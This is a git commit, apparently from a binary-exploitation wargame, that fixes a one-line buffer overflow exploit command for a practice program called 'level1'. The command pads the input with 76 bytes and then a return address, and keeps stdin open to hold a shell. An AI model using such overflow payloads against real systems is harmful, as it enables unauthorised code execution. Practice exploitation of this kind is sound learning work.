fix: add the python to the exploit command
This commit is contained in:
parent
291c839668
commit
89d0e5d442
@ -1 +1 @@
|
|||||||
(print('a'*76 + "\x44\x84\x04\x08"); cat) | ./level1
|
(python -c 'print("a"*76 + "\x44\x84\x04\x08")'; cat) | ./level1
|
||||||
|
Loading…
Reference in New Issue
Block a user